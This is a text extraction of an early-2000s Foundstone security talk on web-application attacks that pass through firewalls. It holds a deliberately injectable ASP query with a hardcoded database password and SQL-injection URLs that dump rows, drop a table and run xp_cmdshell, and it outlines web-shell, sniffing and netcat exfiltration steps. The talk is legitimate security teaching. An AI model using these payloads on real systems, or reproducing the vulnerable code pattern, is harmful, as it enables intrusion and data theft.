![Page 1: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/1.jpg)
One-Way Hacking:Futility of Firewalls in Web
Hacking
JD Glaser, Saumil ShahFoundstone Inc.
![Page 2: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/2.jpg)
Typical Web Application set-up
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
![Page 3: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/3.jpg)
Traditional Hacking…Limitations
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.
![Page 4: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/4.jpg)
Utility of Firewalls
WebServer DB
DB
Web app
Web app
Web app
Web app
Sun RPC
NT ipc$
wu-ftpd XXX
• Hacks on OS network services prevented by firewalls.
![Page 5: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/5.jpg)
Utility of Firewalls
WebServer DB
DB
Web app
Web app
Web app
Web app
X
• Internal back-end application servers are on a non-routable IP network. (private addresses)
![Page 6: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/6.jpg)
Utility of Firewalls
WebServer DB
DB
Web app
Web app
Web app
Web app
X
• Outbound access restricted. Why would a web server telnet out?
![Page 7: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/7.jpg)
Futility of Firewalls
• E-commerce / Web hacking is unfettered.• Web traffic is the most commonly allowed of
protocols through Internet firewalls.• Why fight the wall when you’ve got an open
door?• HTTP is perceived as “friendly” traffic.• Content/Application based attacks are still
perceived as rare.
![Page 8: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/8.jpg)
The Web Hacker’s Toolbox
Essentially, all a web hacker needs is …
• a web browser,• an Internet connection,• … and a clear mind.
![Page 9: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/9.jpg)
Firewalls cannot prevent…
WebServer
WebClient
web server mis-configuration
• URL Interpretation Attacks.
![Page 10: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/10.jpg)
Firewalls cannot prevent…
WebServer
Web app
WebClient Web app
Web app
Web app
poor checking of user inputs
URL Interpretation attacks
• Input Validation attacks.
![Page 11: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/11.jpg)
Firewalls cannot prevent…
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
Input Validation attacks
Extend SQL statements
URL Interpretation attacks
• SQL Query Poisoning
![Page 12: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/12.jpg)
Firewalls cannot prevent…
WebServer DB
DB
Web app
WebClient Web app
Web app
Web app
Reverse-engineering HTTP cookies.
Input Validation attacks
SQL query poisoning
URL Interpretation attacks
• HTTP session hijacking.
• Impersonation.
![Page 13: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/13.jpg)
The URL as a cruise missile
WebServer DB
DB
Web app
Web app
Web app
Web app
http: // 10.0.0.1 / catalogue / display.asp ? pg = 1 & product = 7
![Page 14: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/14.jpg)
Web Hacks - net effects
Web Hacks cause three types of effects:
• Extra information disclosure. (paths, etc.)• Source code and arbitrary file content
disclosure.• Extra data disclosure (e.g. return all rows)• Arbitrary command execution.
![Page 15: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/15.jpg)
The Web Hacker’s Toolbox
Some desired accessories would be …
• a port scanner,• netcat,• vulnerability checker (e.g. whisker),• OpenSSL, … etc.
![Page 16: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/16.jpg)
Hacking over SSL
• Some SSL Myths:• “We are secure because we use SSL!”• “Strong 128 bit crypto being used”• “We use Digital Certificates signed by
VeriSign”
![Page 17: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/17.jpg)
Hacking over SSL
• Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
SSLweb
server
webclient
openssl
nc
![Page 18: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/18.jpg)
Use the Source, Luke
• Source code disclosure may reveal any flaws in the application design.
• Can be used to retrieve application configuraiton files.
• e.g. global.asa, etc.
![Page 19: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/19.jpg)
Source Code Disclosure
• WebLogic / Tomcat example:
![Page 20: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/20.jpg)
Source code disclosure
• IIS +.htr example:
![Page 21: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/21.jpg)
SQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• For example:
Dim sql_con, result, sql_qryConst CONNECT_STRING =
"Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;PWD=xyzzy"
sql_qry = "SELECT * FROM PRODUCT WHERE ID = “ &Request.QueryString(“ID”)
Set objCon = Server.CreateObject("ADODB.Connection")objCon.Open CONNECT_STRINGSet objRS = objCon.Execute(strSQL)
![Page 22: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/22.jpg)
SQL Query Poisoning
• Return all rows:http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
![Page 23: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/23.jpg)
SQL Query Poisoning
• Drop Table:http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3DROP TABLE PRODUCT
![Page 24: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/24.jpg)
SQL Query Poisoning
• Remote Command Execution!http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+‘copy+\winnt\system32\cmd.exe+\inetpub\scripts’
• Command executed:copy \winnt\system32\cmd.exe\inetpub\scripts
![Page 25: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/25.jpg)
One-way attacks
• Assume the tightest firewall configuration.• All legal HTTP requests.• No outbound traffic from internal network.• …yet, total control.• Illustrates how the smallest of openings can
be big enough to drive a truck through it!
![Page 26: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/26.jpg)
One-way attacks … entry point
• One entry point required.• Arbitrary command execution.• Can be achieved in many ways:
• Known vulnerability (e.g. IIS Unicode / ddecode)• Buffer overflow (sometimes kills server!)• Fooling the application itself! (metacharacters,
SQL query poisoning)
![Page 27: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/27.jpg)
One-way attacks … uploader
• Create an HTTP multipart-MIME upload mechanism.
• The same process as sending attachments over web-based mail (yahoo, hotmail).
• Uploader allows the attacker to plant and execute tools on the server.
• The hole widens.
![Page 28: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/28.jpg)
One-way attacks … remote prompt
• Install a remote web-based command prompt.
• HTML form, passes inputs to the command-shell on the server.
• Semi-interactive.
![Page 29: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/29.jpg)
One-way attacks … SQL prompts!
• A step further, install a SQL query prompt page!
• Allows attackers to arbitrarily pick and attack back-end SQL servers.
• Web programming languages such as ASP, PHP allow back-end database interfaces.
• Pilfering of database credentials from source code disclosure attacks would be useful!
![Page 30: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/30.jpg)
One-way attacks … getting root!
• Upload your favourite privilege escalation $pl01t!
• Run it through the web-based command prompt.
• Get admin/root privileges!
![Page 31: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/31.jpg)
One-way attacks … going further
• Drive through the back-end network.• Portscanning• Service enumeration• Network packet sniffing• Recovering passwords / credentials• … it’s all open now!
![Page 32: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/32.jpg)
WinDump
• Loads dynamically – don’t have to reboot box.
• Works great with MDAC, Unicode, etc…• Sniff internal networks after attack.• Grep for user/pass – Pipe output.• Send results back through nc.• Send results back through firewall as an
HTML page – ultra cool because it bypasses firewall
![Page 33: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/33.jpg)
Root Causes of Web Hacks
• Complex web architectures may cause oversight in web server configuration.
• URL Parsing.• File Canonicalization.• Combination of underlying operating system
and web server may leave holes.
![Page 34: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/34.jpg)
Root Causes of Web Hacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.• Security vs. time-to-market.• Zero knowledge administration breeds zero
knowledge administrators.
![Page 35: One-Way Hacking: Futility of Firewalls in Web Hacking](https://reader035.vdocuments.us/reader035/viewer/2022062810/56815cbc550346895dcabd18/html5/thumbnails/35.jpg)
Web Security Measures
• Heighten security awareness amongst administrators, developers and most important - TOP MANAGEMENT!
• Firewalls and SSL do not solve all security problems.
• Keep abreast of latest vendor advisories and patches.
• Monitor security mailing lists such as BugTraq. :-/